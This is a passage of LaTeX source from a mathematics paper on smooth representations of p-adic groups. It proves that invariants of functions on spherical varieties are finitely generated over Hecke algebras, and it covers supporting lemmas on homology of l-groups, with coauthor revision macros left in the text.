statement now follows from the previous step.
}
\Rami{
Step 3. Proof for the case when $K$ is splitting.
}
\Rami{
Let $W<V$ be the subrepresentation generated by $V^K$. By
definition $W \in \mathcal M(G,K)$ and hence $W = \oplus_{i=1}^n W_i$
where $W_i \in \mathcal M_{\rho_i}$ for some $\rho_i$. The lemma now
follows from the previous step.
}
\Rami{
Step 4. General case
}
\Rami{
Let $K'$ be a splitting subgroup s.t. $K'<K$.
Let $v_1...v_n \in V^{K'}$ be the generators of $V^{K'}$ over
$Z(\mathcal{H}_{K'}(G(F)))$ given by the previous step. Define $w_i:=e_{K}\Dima{v_i} \in V^{K}$ where $e_{K}\in \mathcal{H}_{K}(G(F))$ is the normalized Haar measure of $K.$ Let us show that $w_i$ generate $V^{K}$ over
$Z(\mathcal{H}_{K}(G(F)))$. Let $x \in V^{K}$. We can represent $x$ as a sum $\sum h_i v_i$, where $h_i \in Z(\mathcal{H}_{K'}(G(F)))$. Now $$x=e_{K}x=\sum e_{K}h_i v_i=\sum e_{K} e_{K}h_i v_i=\sum e_{K} h_i e_{K}v_i=\sum e_{K} h_i e_{K} e_{K}v_i= \sum e_{K} h_i e_{K} w_i.$$}
\end{proof}
Finally, in this subsection, we state two facts about homologies of $l$-groups. The proofs and relevant definitions are in Subsection \ref{subsec:homologies}.
\begin{lemma} \lbl{FinDimH1H0}
Let $G$ be an algebraic group and $U$ be its unipotent radical.
Let $\rho$ be an irreducible cuspidal representation of
$(G/U)(F)$. We treat $\rho$ as a representation of $G(F)$ with
trivial action of $U(F)$.
Let $H<G$ be an algebraic subgroup. Suppose that the space of
coinvariants $\rho_{H(F)}$ is finite dimensional. Then $\dim
\operatorname{H}_1(H(F),\rho)< \infty .$
\end{lemma}
We will also use the following version of Shapiro Lemma.
\begin{lemma} \lbl{LemShap}
Let $G$ be an $l$-group that acts transitively on an $l$-space
$X$. Let $\mathcal F$ be a $G$-equivariant sheaf over $X$. Choose a point
$x \in X$, let $\mathcal F_x$ denote the stalk of $\mathcal F$ at $x$ and $G_x$
denote the stabilizer of $x$. Then
$$\operatorname{H}_i(G,\mathcal F(X))= \operatorname{H}_i(G_x,\mathcal F_x).$$
\end{lemma}
\subsection{Descent Of
Finite Multiplicity} \lbl{subsec:desc.cusp}
\begin{definition}
We call a pair $(G,H)$ consisting of a reductive group $G$ and an
algebraic subgroup $H$ \textbf{an $F$-spherical pair} if for any
parabolic subgroup $P \subset G$, there is a finite number of
double cosets in $P(F) \setminus G(F) / H(F)$.
\end{definition}
\begin{remark}
If $char F=0$ \Dima{and $G$ is quasi-split over $F$} then $(G,H)$ is an $F$-spherical pair if and only if
it is a spherical pair of algebraic groups. However, we do not
know whether this is true if $char F>0$.
\end{remark}
\begin{notation}
Let $G$ be a reductive group and $H$ be a subgroup. Let $P<G$ be
a parabolic subgroup and $M$ be its Levi quotient. We denote by
$H_M$ the image of \nir{$H\cap P$} under the projection $P \twoheadrightarrow
M$.
\end{notation}
The following Lemma is the main step in the proof of Theorem \ref{IntFinGen}
\begin{lemma} \lbl{FinMultCuspDesc}
Let $(G,H)$ be an $F$-spherical pair. Let $P<G$ be a parabolic
subgroup and $M$ be its Levi \nir{quotient}. Then\\
(i) $(M, H_M)$ is also an $F$-spherical pair.\\
(ii) Suppose also that for any smooth irreducible representation
$\rho$ of $G(F)$ we have $$\dim\Hom_{H(F)}(\rho|_{H(F)}, \mathbb C) <
\infty.$$ Then for any irreducible cuspidal representation $\sigma$
of $M(F)$ we have $$\dim\Hom_{H_M(F)}(\sigma|_{H_M(F)}, \mathbb C) <
\infty.$$
\end{lemma}
\begin{remark}
One can show that the converse of (ii) is also true. Namely, if
$\dim\Hom_{H_M(F)}(\sigma|_{H_M(F)}, \mathbb C) < \infty$ for any
irreducible cuspidal representation $\sigma$ of $M(F)$ for any
Levi subquotient $M$ then $\dim\Hom_{H(F)}(\rho|_{H(F)}, \mathbb C) <
\infty$ for any smooth irreducible representation $\rho$ of
$G(F)$. We will not prove this since we will not use this.
\end{remark}
We will need the following lemma.
\begin{lemma} \lbl{LinAlg}
Let $M$ be an l-group and $V$ be a smooth representation of $M$.
Let $0=F^0V \subset ... \subset F^{n-1}V \subset F^nV=V$ be a
finite filtration of $V$ by subrepresentations. Suppose that for
any $i$, either $$\dim (F^iV/F^{i-1}V)_M = \infty$$ or $$\text{both }\dim
(F^iV/F^{i-1}V)_M < \infty \text{ and }\dim \operatorname{H}_1(M,(F^iV/F^{i-1}V)) <
\infty.$$ Suppose also that $\dim V_M < \infty$. Then $\dim
(F^iV/F^{i-1}V)_M < \infty$ for any $i$.
\end{lemma}
\begin{proof}
\nir{We prove by a decreasing induction on $i$ that $\dim(F^iV)_M<\infty$, and, therefore, $\dim(F^iV/F^{i-1}V)_M<\infty$. Consider the short exact sequence
$$0 \to F^{i-1}V \to F^iV \to F^iV/F^{i-1}V \to 0,$$
and the corresponding long exact sequence
$$...\to \operatorname{H}_1(M,(F^iV/F^{i-1}V)) \to (F^{i-1}V)_M \to (F^iV)_M \to (F^iV/F^{i-1}V)_M \to 0.$$
In this sequence $\dim \operatorname{H}_1(M,(F^iV/F^{i-1}V))< \infty$ and $\dim
(F^iV)_M < \infty$, and hence $\dim (F^{i-1}V)_M < \infty$.}
\end{proof}
Now we are ready to prove Lemma \ref{FinMultCuspDesc}.
\begin{proof}[Proof of Lemma \ref{FinMultCuspDesc}]
$ $\\
(i) is trivial.\\
(ii) Let $P<G$ be a parabolic subgroup, $M$ be the Levi quotient
of $P$ and let $\rho$ be a cuspidal representation of $M(F)$. We
know that $\dim (i_{GM}\rho)_{H(F)}< \infty$ and we have to show
that $\dim \rho_{H_M(F)}< \infty$.
Let $\mathcal{I}$ denote the natural $G(F)$-equivariant \nir{locally constant sheaf of complex vector spaces} on
$G(F)/P(F)$ such that $i_{GM}\rho \cong {\mathcal S}(G(F)/P(F),
\mathcal{I})$. Let $Y_j$ denote the $H(F)$ orbits on $G(F)/P(F)$.
We know that there exists a natural filtration on ${\mathcal S}(G(F)/P(F),
\mathcal{I})|_{H(F)}$ with associated graded components isomorphic
to ${\mathcal S}(Y_j,\mathcal{I}_j)$, where $\mathcal{I}_j$ are $H(F)$-
equivariant sheaves on $Y_j$ corresponding to $\mathcal{I}$. For
any $j$ choose a representative $y_j \in Y_j$. Do it in such a way
that there exists $j_0$ such that $y_{j_0}=[1]$. Let
$P_j:=G_{y_j}$ and $M_j$ be its Levi quotient. Note that $P_{j_0} = P$ and
$M_{j_0} = M$. Let $\rho_j$ be the stalk of $\mathcal{I}_j$ at the
point $y_j$. Clearly $\rho_j$ is a cuspidal irreducible
representation of $M_j(F)$ and $\rho_{j_0}=\rho$. By Shapiro Lemma
(Lemma \ref{LemShap}) $$\operatorname{H}_i(H(F),{\mathcal S}(Y_j,\mathcal{I}_j)) \cong
\operatorname{H}_i((H \cap P_j)(F), \rho_j).$
By Lemma \ref{FinDimH1H0} either $\dim \operatorname{H}_0((H \cap P_j)(F),
\rho_j) = \infty$ or both $\dim \operatorname{H}_0((H \cap P_j)(F), \rho_j) <
\infty$ and $\dim \operatorname{H}_1((H \cap P_j)(F), \rho_j) < \infty$. Hence
by Lemma \ref{LinAlg} $\dim \operatorname{H}_0((H \cap P_j)(F), \rho_j) <
\infty$ and hence $\dim \rho_{H_M(F)}< \infty$.
\end{proof}
\subsection{Proof of Theorem \ref{IntFinGen}} \lbl{SecPfFinGen} $ $
In this subsection we prove Theorem \ref{IntFinGen}. Let us remind
its formulation.
\begin{theorem} \lbl{FinGen}
Let $(G,H)$ be an $F$-spherical pair. Suppose that for any
irreducible smooth representation $\rho$ of $G(F)$ we have
\begin{equation} \lbl{FinMult}
\dim\Hom_{H(F)}(\rho|_{H(F)}, \mathbb C) < \infty .
\end{equation}
Then for any \Dima{compact open}
subgroup $K<G(F)$, ${\mathcal S}(G(F)/H(F))^K$ is a
finitely generated module over the Hecke algebra
$\mathcal{H}_K(G(F))$.
\end{theorem}
\begin{remark}
Conjecturally, any $F$-spherical pair satisfies the condition
(\ref{FinMult}). In \cite{Del} and in \cite{SV} this is proven for
wide classes of spherical pairs, which include all symmetric pairs
over fields of characteristic different from 2.
\end{remark}
We will need several lemmas and definitions.
\nir{
\begin{lemma} \lbl{G1}
Let $(G,H)$ be an $F$-spherical pair, and denote $\widetilde{H}=H(F)Z(G(F))\cap G^1$.
Suppose that for any smooth
(respectively cuspidal) irreducible representation $\rho$ of
$G(F)$ we have $\dim\Hom_{H(F)}(\rho|_{H(F)}, \mathbb C) < \infty$. Then
for any smooth (respectively cuspidal) irreducible representation
$\rho$ of $G(F)$ and for every character $\widetilde{\chi}$ of $\widetilde{H}$ whose restriction to $H(F)\cap G^1$ is trivial, we have
$$\dim\Hom_{\widetilde{H}}(\rho|_{\widetilde{H}}, \widetilde{\chi}) < \infty.$$
\end{lemma}
}
\begin{proof}
\nir{
Let $\rho$ be a smooth (respectively cuspidal) irreducible
representation of $G(F)$, and let $\widetilde{\chi}$ be a character of $\widetilde{H}$ whose restriction to $H(F)\cap G^1$ is trivial.
\[
\Hom_{\widetilde{H}}\left (\rho|_{\widetilde{H}}, \widetilde{\chi} \right ) =
\Hom_{(H(F) Z(G(F)))\cap G_0} \left (\rho|_{(H(F) Z(G(F)))\cap G_0}, Ind_{\widetilde{H}}^{(H(F) Z(G(F)))\cap G_0}\widetilde{\chi}\right) .
\]
Since $$H(F)Z(G(F))\cap G_0=\widetilde{H}Z(G(F))\cap G_0=\widetilde{H}Z(G(F)),$$
the subspace of $Ind_{\widetilde{H}}^{(H(F) Z(G(F)))\cap G_0}\widetilde{\chi}$ that transforms under $Z(G(F))$ according to the central character of $\rho$ is at most one dimensional. If this subspace is trivial, then the lemma is clear. Otherwise, denote it by $\tau$. Since $H(F)\cap G^1$ is normal in $H(F)Z(G(F))$, we get that the restriction of $Ind_{\widetilde{H}}^{(H(F) Z(G(F)))\cap G_0}\widetilde{\chi}$ to $H(F)\cap G^1$ is trivial, and hence that $\tau|_{H(F)\cap G^1}$ is trivial. Hence $\Hom_{\widetilde{H}}\left (\rho|_{\widetilde{H}}, \widetilde{\chi} \right )$ is equal to
\[
\Hom_{(H(F) Z(G(F)))\cap G_0} \left (\rho|_{(H(F) Z(G(F)))\cap G_0}, \tau\right)=\Hom_{H(F)\cap G_0} \left (\rho|_{H(F) \cap G_0}, \tau|_{H(F)\cap G_0}\right)=
\]
\[
=\Hom_{H(F)}\left(\rho|_{H(F)},Ind_{H(F)\cap G_0}^{H(F)}\tau|_{H(F)\cap G_0}\right).
\]
Since $H(F) / H(F)\cap G_0$ is finite and abelian, the representation $Ind_{H(F)\cap G_0}^{H(F)}\tau|_{H(F)\cap G_0}$ is a finite direct sum of characters of $H(F)$, the restrictions of all to $H(F)\cap G^1$ are trivial. Any character $\theta$ of $H(F)$ whose restriction to $H(F)\cap G^1$ is trivial can be extended to a character of $G(F)$, because $H(F)/(H(F)\cap G^1)$ is a sub-lattice of $G(F)/G^1$. Denoting the extension by $\Theta$, we get that
\[
\Hom_{H(F)}\left(\rho|_{H(F)},\theta\right)=\Hom_{H(F)}\left((\rho\otimes\Theta^{-1})|_{H(F)},\mathbb C\right),
\]
but $\rho\otimes\Theta^{-1}$ is again smooth (respectively cuspidal) irreducible representation of $G(F)$, so this last space is finite-dimensional.
}
\end{proof}
\Rami{
\begin{lemma} \lbl{CA}
Let $A$ be a commutative unital Noetherian algebra without zero divisors and let $K$ be its field of fractions. Let $K^\mathbb N$ be the space of all sequences of elements of $K$. Let $V$ be a finite dimensional subspace of $K^\mathbb N$ and let $M:=V \cap A^\mathbb N$. Then $M$ is finitely generated.
\end{lemma}
\nir{
\begin{proof} Since $A$
\Rami{
does not have zero divisors}, $M$ injects into $K^\mathbb N$. There is a number $n$ such that the projection of $V$ to $K^{\{1,\ldots n\}}$ is injective. Therefore, $M$ injects into $A^{\{1,\ldots n\}}$, and, since $A$ is Noetherian, $M$ is finitely generated.
\end{proof}
}
\nir{
\begin{lemma} \lbl{fg}
Let $M$ be an $l$-group, let $L\subset M$ be a closed subgroup, and let $L' \subset L$ be an open normal subgroup of $L$ such that $L/L'$ is a lattice. Let $\rho$ be a smooth representation of $M$ of countable dimension. Suppose that for any character $\chi$ of $L$ whose restriction to $L'$ is trivial we have $$\dim\Hom_{L}(\rho|_{L}, \chi) < \infty.$$
Consider $\Hom_{L'}(\rho, {\mathcal S}(L/L'))$ as a representation of $L$, where $L$ acts by $((hf)(x))([y])=(f(x))([y h])$. Then this representation is finitely generated. \end{lemma}
\begin{proof} By assumption, the action of $L$ on $\Hom_{L'}(\rho,{\mathcal S}(L/L'))$ factors through $L/L'$. Since $L/L'$ is discrete, ${\mathcal S}(L/L')$ is the group algebra $\mathbb C[L/L']$. We want to show that $\Hom_{L'}(\rho,\mathbb C[L/L'])$ is a finitely generated module over $\mathbb C[L/L']$.
Let $\mathbb C(L/L')$ be the fraction field of $\mathbb C[L/L']$. Choosing a countable basis for the vector space of $\rho$, we can identify any $\mathbb C$-linear map from $\rho$ to $\mathbb C[L/L']$ with an element of $\mathbb C[L/L']^\mathbb N$. Moreover, the condition that the map intertwines the action of $L/L'$ translates into a collection of linear equations that the tuple in $\mathbb C[L/L']^\mathbb N$ should satisfy. Hence, $\Hom_{L'}(\rho,\mathbb C[L/L'])$ is the intersection of the $\mathbb C(L/L')$-vector space $\Hom_{L'}(\rho,\mathbb C(L/L'))$ and $\mathbb C[L/L']^\mathbb N$. By Lemma \ref{CA}, it suffices to prove that $\Hom_{L'}(\rho,\mathbb C(L/L'))$ is finite dimensional over $\mathbb C(L/L')$.
Since
\Dima{$L'$ is separable, and $\rho$ is smooth and of countable dimension,}
there are only countably many linear equations defining $\Hom_{L'}(\rho,\mathbb C(L/L'))$; denote them by $\phi_1,\phi_2,\ldots\in\left(\mathbb C(L/L')^\mathbb N\right)^*$. Choose a countable subfield $K\subset\mathbb C$ that contains all the coefficients of the elements of $\mathbb C(L/L')$ that appear in any of the $\phi_i$'s. If we define $W$ as the
\Rami{
$K(L/L')$}-linear subspace of
\Rami{
$K(L/L')^\mathbb N$}
\Dima{defined} by the $\phi_i$'s, then $\Hom_{L'}(\rho,\mathbb C(L/L'))=W\otimes_{K(L/L')} \mathbb C(L/L')$, so $\dim_{\mathbb C(L/L')}\Hom_{L'}(\rho,\mathbb C(L/L'))=\dim_{K(L/L')}W$.
Since $L/L'$ is a lattice generated by, say, $g_1,\ldots,g_n$, we get that $K(L/L')=K(t_1^{\pm 1},\ldots,t_n^{\pm 1})$ \Rami{$=K(t_1,\ldots,t_n)$}. Choosing elements $\pi_1,\ldots,\pi_n\in\mathbb C$ such that $tr.deg_K(K(\pi_1,\ldots,\pi_n))=n$, we get an injection $\iota$ of
$K(L/L')$ into $\mathbb C$. As before, we get that if we denote the $\mathbb C$-vector subspace of $\mathbb C^\mathbb N$ cut by the equations $\iota(\phi_i)$ by $U$, then $\dim_{K(L/L')}W=\dim_{\mathbb C}U$. However, $U$ is isomorphic to $\Hom_{L'}(\rho,\chi)$, where $\chi$ is the character \Rami{of $L/L'$} such that $\chi(g_i)=\pi_i$. By assumption, this last vector space is finite dimensional.
\end{proof}}
}
Now we are ready to prove Theorem \ref{FinGen}.
\begin{proof}[Proof of Theorem \ref{FinGen}]
By Lemma \ref{VKFinGen} it is enough to show that for any
parabolic $P<G$ and any irreducible cuspidal representation $\rho$
of $M(F)$ (where $M$ denotes the Levi quotient of $P$),
$ \Hom(i_{GM}(\Psi(\rho)),{\mathcal S}(G(F)/H(F)))$ is a finitely generated
module over $\mathcal O(\Psi_M)$.
\Rami{
Step 1. Proof for the case $P=G$.\\
We have
$$\Hom_{G(F)}(i_{GM}(\Psi(\rho)),{\mathcal S}(G(F)/H(F)))=
\Hom_{G(F)}(\Psi(\rho),{\mathcal S}(G(F)/H(F))) =
\Hom_{G^1}(\rho,{\mathcal S}(G(F)/H(F))).$$
Here we consider the space $\Hom_{G^1}(\rho,{\mathcal S}(G(F)/H(F)))$ with
the natural action of $G$. Note that $G^1$ acts trivially and
hence this action gives rise to an action of $G/G^1$, which gives
the $\mathcal O(\Psi_G)$ - module structure.
Now consider the subspace $$V:=\Hom_{G^1}(\rho,{\mathcal S}(G^1/(H(F) \cap
G^1))) \subset \Hom_{G^1}(\rho,{\mathcal S}(G(F)/H(F))).$$ It generates
$\Hom_{G^1}(\rho,{\mathcal S}(G(F)/H(F)))$ as a representation of $G(F)$,
and therefore also as an $\mathcal O(\Psi_G)$ - module. Note that $V$ is $H(F)$ invariant. Therefore it is enough to show that $V$ is finitely generated over $H(F).$
Denote $H':=H(F) \cap
G^1$ and $H'':= (H(F) Z(G(F)))\cap G^1$.
Note that $${\mathcal S}(G^1/H') \cong ind_{H''}^{G^1}({\mathcal S}(H''/H')) \subset Ind_{H''}^{G^1}({\mathcal S}(H''/H')).$$ Therefore $V$ is canonically embedded into $\Hom_{H''}(\rho,{\mathcal S}(H''/H'))$. The action of $H$ on $V$ is naturally extended to an action $\Pi$ on $\Hom_{H''}(\rho,{\mathcal S}(H''/H'))$ by $$((\Pi(h)(f))(v))([k])=f(h^{-1}v)([h^{-1}kh]).$$ Let $\Xi$ be the action of $H''$ on $\Hom_{H''}(\rho,{\mathcal S}(H''/H'))$ as described in Lemma \Dima{\ref{fg}}, i.e. $$((\Xi(h)(f))(v))([k])=f(v)([kh]).$$ By Lemmas \Dima{\ref{fg}} and \Dima{\ref{G1}} it is enough to show that for any $h \in H''$ there exist an $h' \in H$ and a scalar $\alpha$ s.t. $$\Xi(h)=\alpha \Pi(h').$$ In order to show this let us decompose $h$ to a product $h=zh'$ where $h' \in H$ and $z\in Z(G(F))$. Now
\begin{multline*}
((\Xi(h)(f))(v))([k])=f(v)([kh])=f(h^{-1}v)([h^{-1}kh])=f(h^{'-1}z^{-1}v)([h^{'-1}kh'])=\\=
\alpha f(h'^{-1}v)([h^{'-1}kh'])= \alpha((\Pi(h')(f))(v))([k]),
\end{multline*}
where $\alpha$ is the scalar with which
$z^{-1}$ acts on $\rho$.}
\Rami{Step 2}. Proof in the general case.
\nir{
\begin{multline*}
\Hom_{G(F)}(i_{GM}(\Psi(\rho)),{\mathcal S}(G(F)/H(F)))=
\Hom_{M(F)}(\Psi(\rho),\overline{r}_{MG}({\mathcal S}(G(F)/H(F)))) = \\ =
\Hom_{M(F)}(\Psi(\rho),(({\mathcal S}(G(F)/H(F)))|_{\overline{P}(F)})_{\overline{U}(F)}),
\end{multline*}
where $\overline{U}$ is the unipotent radical of $\overline{P}$, the parabolic opposite to $P$. Let $\{Y_i\}_{i=1}^n$
be the orbits of $\overline{P}(F)$ on $G(F)/H(F)$. We know that there exists
a filtration on $({\mathcal S}(G(F)/H(F)))|_{\overline{P}(F)}$ such that the
associated graded components are isomorphic to ${\mathcal S}(Y_i)$.
Consider the corresponding filtration on
$(({\mathcal S}(G(F)/H(F)))|_{\overline{P}(F)})_{\overline{U}(F)}$. Let $V_i$ be the associated
graded components of this filtration. We have a natural surjection
${\mathcal S}(Y_i)_{\overline{U}} \twoheadrightarrow V_i$. In order to prove that
$\Hom_{\Dima{M}(F)}(\Psi(\rho),(({\mathcal S}(G(F)/H(F)))|_{\overline{P}(F)})_{\overline{U}(F)})$ is
finitely generated it is enough to prove that
$\Hom_{M(F)}(\Psi(\rho),V_i)$ is finitely generated. Since
$\Psi(\rho)$ is a projective object of $\mathcal M(M(F))$ (by Corollary
\ref{CuspProj}), it is enough to show that
$\Hom_{M(F)}(\Psi(\rho),{\mathcal S}(Y_i)_{\overline{U}(F)})$ is finitely generated. Denote
$Z_i := \overline{U}(F) \setminus Y_i $. It is easy to see that $Z_i \cong
M(F)/ ((H_i)_M(F))$, where $H_i$ is some conjugation of $H$.
}
Now the assertion follows from the previous step using Lemma
\ref{FinMultCuspDesc}.
\end{proof}
\subsection{Homologies of $l$-groups}\lbl{subsec:homologies}$ $
The goal of this subsection is to prove Lemma \ref{FinDimH1H0} and
Lemma \ref{LemShap}.
We start with some generalities on abelian categories.
\begin{definition}
Let $\mathcal C$ be an abelian category. We call a family of objects $\mathcal A
\subset Ob(\mathcal C)$ \textbf{generating} family if for any object $X
\in Ob(\mathcal C)$ there exists an object $Y \in \mathcal A$ and an epimorphism
$Y \twoheadrightarrow X$.
\end{definition}
\begin{definition}
Let $\mathcal C$ and $\mathcal D$ be abelian categories and $\mathcal F: \mathcal C \to \mathcal D$
be a right-exact additive functor. A family of objects $\mathcal A
\subset Ob(\mathcal C)$ is called \textbf{$\mathcal F$-adapted} if it is
generating
\Rami{, closed under direct sums
and for any exact sequence $0 \to A_1 \to A_2 \to ...
$ with $A_i \in \mathcal A$, the sequence $0 \to \mathcal F(A_1) \to \mathcal F(A_2) \to...$ is also exact.
}
\Dima{For example,
\Rami{a generating,
closed under direct sums system consisting of}
projective objects
is $\mathcal F$-adapted for any \Dima{right-exact}
functor $\mathcal F$.}
\Rami{For an $\l$-group $G$ the system of objects consisting of direct sums of copies of ${\mathcal S}(G)$ is an example of such system.}
\end{definition}
The following results are well-known.
\begin{theorem}
Let $\mathcal C$ and $\mathcal D$ be abelian categories and $\mathcal F: \mathcal C \to \mathcal D$
be a right-exact additive functor. Suppose that there exists an
$\mathcal F$-adapted family $\mathcal A \subset Ob(\mathcal C)$. Then $\mathcal F$ has derived
functors.
\end{theorem}
\begin{lemma} \lbl{HomLeib}
Let $\mathcal A$, $\mathcal B$ and $\mathcal C$ be abelian categories. Let $\mathcal F:\mathcal A \to
\mathcal B$ and $\mathcal G:\mathcal B \to \mathcal C$ be right-exact additive functors.
Suppose that both $\mathcal F$ and $\mathcal G$ have derived functors.
(i) Suppose that $\mathcal F$ is exact. Suppose also that there exists a
class $\mathcal E \subset Ob(\mathcal A)$ which is $\mathcal G \circ \mathcal F$-adapted and
such that $\mathcal F(X)$ is $\mathcal G$-acyclic for any $X \in \mathcal E$. Then \nir{the functors $L^i(\mathcal G \circ \mathcal F)$ and $L^i\mathcal G \circ \mathcal F$ are isomorphic.}
(ii) Suppose that there exists a class $\mathcal E \subset Ob(\mathcal A)$ which
is $\mathcal G \circ \mathcal F$-adapted and $\mathcal F$-adapted and such that
$\mathcal F(X)$ is $\mathcal G$-acyclic for any $X \in \mathcal E$. Let $Y \in \mathcal A$ be
an $\mathcal F$-acyclic object. Then \nir{$L^i(\mathcal G \circ \mathcal F)(Y)$ is (naturally) isomorphic to $L^i\mathcal G( \mathcal F(Y))$.}
(iii) Suppose that $\mathcal G$ is exact. Suppose that there exists a
class $\mathcal E \subset Ob(\mathcal A)$ which is $\mathcal G \circ \mathcal F$-adapted and
$\mathcal F$-adapted. Then \nir{the functors $L^i(\mathcal G \circ \mathcal F)$ and $\mathcal G \circ L^i\mathcal F$ are isomorphic.}
\end{lemma}
\begin{definition}
Let $G$ be an $l$-group. For any smooth representation $V$ of $G$ denote $\operatorname{H}_i(G, V):=L^iCI_G(V)$.
Recall that $CI_G$ denotes the coinvariants functor.
\end{definition}
\begin{proof}[Proof of Lemma \ref{LemShap}]
Note that $\mathcal F(X) = ind_{G_x}^G \mathcal F_x$. Note also that
$ind_{G_x}^G$ is an exact functor, and $CI_{G_x} = CI_{G} \circ
ind_{G_x}^G$. The lemma follows now from Lemma \ref{HomLeib}(i).
\end{proof}
\begin{lemma} \lbl{AFG}
Let $L$ be a \nir{lattice.}
Let $V$ be a linear
space. Let $L$ act on $V$ by a character. Then
$$\operatorname{H}_1(L,V) = \operatorname{H}_0(L,V) \otimes_{\mathbb C}(L \otimes_{\mathbb Z}\mathbb C).$$
\end{lemma}
The proof of this lemma is straightforward.
\begin{lemma} \lbl{HomCoinv}
Let $L$ be an $l$-group and $L'<L$ be a subgroup. Then\\
(i) for any representation $V$ of $L$ we have
$$\operatorname{H}_i(L',V)=L^i\mathcal{F}(V),$$ where $\mathcal{F}: \mathcal M(L) \to
Vect$ is the functor defined by $\mathcal{F}(V)=V_{L'}$.\\
(ii) Suppose that $L'$ is normal. Let $\mathcal{F'}: \mathcal M(L) \to
\mathcal M(L/L')$ be the functor defined by $\mathcal{F'}(V)=V_{L'}$. Then
for any representation $V$ of $L$ we have
$\operatorname{H}_i(L',V)=L^i\mathcal{F'}(V).$
\end{lemma}
\begin{proof}
(i) Consider the restriction functor $Res_{L'}^L: \mathcal M(L) \to
\mathcal M(L')$. Note that it is exact. Consider also the functor
$\mathcal G:\mathcal M(L') \to Vect$ defined by $\mathcal G(\rho):=\rho_{L'}$. Note
that $\mathcal F=\mathcal G \circ Res_{L'}^L$. The
\Rami{assertion}
follows now from Lemma
\ref{HomLeib}(i)
\Rami{using the fact that ${\mathcal S}(L)$ is a projective object in $\mathcal M(L')$}.\\
(ii) follows from (i) in a similar way, but using part (iii) of
Lemma \ref{HomLeib} instead part (i).
\end{proof}
\begin{lemma} \lbl{CuspAcyc}
Let $G$ be a reductive group and $H<G$ be a subgroup. Consider the
functor $$\mathcal{F}: \mathcal M(G(F)) \to \mathcal M(H(F)/(H(F)\cap G^1))
\text{ defined by }\mathcal{F}(V)=V_{H(F)\cap G^1}.$$ Then any \nir{finitely generated}
cuspidal representation of $G(F)$ is an $\mathcal{F}$-acyclic
object.
\end{lemma}
\begin{proof}
Consider the restriction functors $$Res_{1}^{H(F)/(H(F)\cap G^1)}:
\mathcal M(H(F)/(H(F)\cap G^1)) \to Vect$$ and $$Res_{G^1}^{G(F)}:
\mathcal M(G(F)) \to \mathcal M(G^1).$$ Note that they are exact. Consider also
the functor $\mathcal G:\mathcal M(G^1) \to Vect$ defined by
$\mathcal G(\rho):=\rho_{G^1 \cap H(F)}$. Denote $\mathcal E:= \mathcal G \circ
Res_{G^1}^{G(F)}$. Note that $\mathcal E= Res_{1}^{H(F)/(H(F)\cap G^1)}
\circ \mathcal F$.
$$\xymatrix{\parbox{40pt}{$\mathcal M(G(F))$}\ar@{->}^{\mathcal F \quad \quad
\quad \quad}[r]\ar@{->}^{\mathcal E}[dr]\ar@{->}_{Res_{G^1}^{G(F)} }[d] &
\parbox{110pt}{$\mathcal M(H(F)/(H(F)\cap
G^1))$}\ar@{->}^{Res_{1}^{H(F)\cap G^1}}[d]\\
\parbox{30pt}{$\mathcal M(G^1)$}\ar@{->}^{\mathcal G}[r] &
\parbox{25pt}{$Vect$}}$$
Let $\pi$ be a cuspidal finitely generated representation of $G(F)$. By Corollary
\ref{CuspProj}, $Res_{G^1}^{G(F)}(\pi)$ is projective and hence
$\mathcal G$-acyclic. Hence by Lemma \ref{HomLeib}(ii) $\pi$ is
$\mathcal E$-acyclic. Hence by Lemma \ref{HomLeib}(iii) $\pi$ is
$\mathcal F$-acyclic.
\end{proof}
\begin{lemma} \lbl{HomQGroups}
Let $L$ be an l-group and $L'<L$ be a normal subgroup. Suppose
that $\operatorname{H}_i(L',\mathbb C)=0$ for all $i>0$. Let $\rho$ be a
representation of $L/L'$. Denote by $Ext(\rho)$ the natural
representation of $L$ obtained from $\rho$. Then
$\operatorname{H}_i(L/L',\rho)=\operatorname{H}_i(L,Ext(\rho))$.
\end{lemma}
\begin{proof}
Consider the coinvariants functors $\mathcal E: \mathcal M(L) \to Vect$ and
$\mathcal F: \mathcal M(L/L') \to Vect$ defined by $\mathcal E(V):=V_L$ and
$\mathcal F(V):=V_{L/L'}$. Note that $\mathcal F = \mathcal E \circ Ext$ and $Ext$ is
exact. By Shapiro Lemma (Lemma \ref{LemShap}), ${\mathcal S}(L/L')$ is acyclic with respect to
both $\mathcal E$ and $\mathcal F$. The lemma follows now from Lemma
\ref{HomLeib}(ii).
\end{proof}
\begin{remark}
Recall that if $L'=N(F)$ where $N$ is a unipotent algebraic group,
then $\operatorname{H}_i(L')=0$ for all $i>0$.
\end{remark}
Now we are ready to prove Lemma \ref{FinDimH1H0}
\begin{proof}[Proof of Lemma \ref{FinDimH1H0}]
By Lemma \ref{HomQGroups} we can assume that $G$ is reductive.
Let $\mathcal F:\mathcal M(G(F)) \to Vect$ be the functor defined by
$\mathcal F(V):=V_{H(F)}.$ Let $$\mathcal G:\mathcal M(G(F)) \to \mathcal M(H(F)/(H(F)\cap
G^1))$$ be defined by $$\mathcal G(V):=V_{H(F)\cap G^1}.$$ Let
$$\mathcal E:\mathcal M(H(F)/(H(F)\cap G^1)) \to Vect$$ be defined by
$$\mathcal E(V):=V_{H(F)/(H(F)\cap G^1)}.$$ Clearly, $\mathcal F=\mathcal E \circ \mathcal G$.
By Lemma \ref{CuspAcyc}, $\rho$ is $\mathcal G$-acyclic. Hence by Lemma
\ref{HomLeib}(ii), $L^i\mathcal F(\rho)=L^i\mathcal E(\mathcal G(\rho))$.
$$\xymatrix{\parbox{40pt}{$\mathcal M(G(F))$}\ar@{->}^{\mathcal G \quad \quad \quad \quad}[r] \ar@/^3pc/@{->}^{\mathcal F}[rrr] &
\parbox{105pt}{$\mathcal M(H(F)/(H(F)\cap G^1))$}\ar@/^2pc/@{->}^{\mathcal E}[rr]\ar@{->}^{\mathcal K}[r] &
\parbox{105pt}{$\mathcal M(H(F)/(H(F)\cap G^0))$} \ar@{->}^{\quad \quad \quad \quad \mathcal C}[r] &
\parbox{25pt}{$Vect$}}$$
Consider the coinvariants functors $\mathcal K: \mathcal M(H(F)/(H(F)\cap G^1))
\to \mathcal M(H(F)/(H(F)\cap G^0))$ and $\mathcal C:\mathcal M(H(F)/(H(F)\cap G^0))
\to Vect$ defined by $\mathcal K(\rho):=\rho_{(H(F) \cap G_0)/(H(F)\cap
G^1)}$ and $\mathcal C(\rho):=\rho_{H(F)/(H(F)\cap G^1)}$. Note that $\mathcal E
= \mathcal C \circ \mathcal K$.
Note that
$\mathcal C$ is exact since the group $H(F)/(H(F)\cap G^1)$ is finite.
